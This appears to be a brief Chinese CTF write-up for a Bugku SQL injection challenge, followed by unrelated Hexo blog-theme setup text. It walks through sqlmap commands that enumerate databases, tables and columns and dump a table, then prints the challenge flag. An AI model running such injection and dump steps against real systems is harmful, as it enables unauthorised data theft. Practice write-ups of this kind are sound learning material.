原题地址:http://123.206.87.240:8002/chengjidan/
も一度~
随便输几个试试
应该是SQL注入
先用burp抓个包
保存到本地文件后,使用sqlmap工具爆库
先输入
sqlmap.py -r "D:\1.txt" -id --dbs
-r是读文件,引号内是刚刚数据包保存文件的路径,-p是参数名,可以在数据包中看到, –dbs意思是想获取数据库名字
出来两个库
再输入sqlmap.py -r "D:\1.txt" -D skctf_flag -p id --tables获取表名
得到两个表
再输入sqlmap.py -r "D:\1.txt" -D skctf_flag -T fl4g -p id --columns获取列名
再输入sqlmap.py -r "D:\1.txt" -D skctf_flag -T fl4g -C skctf_flag -p id --dump得到flag
BUGKU{Sql_INJECT0N_4813drd8hz4}
缺失模块。
1、请确保node版本大于6.2
2、在博客根目录(注意不是yilia根目录)执行以下命令:
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置:
jsonContent:
meta: false
pages: false
posts:
title: true
date: true
path: true
text: false
raw: false
content: false
slug: false
updated: false
comments: false
link: false
permalink: false
excerpt: false
categories: false
tags: true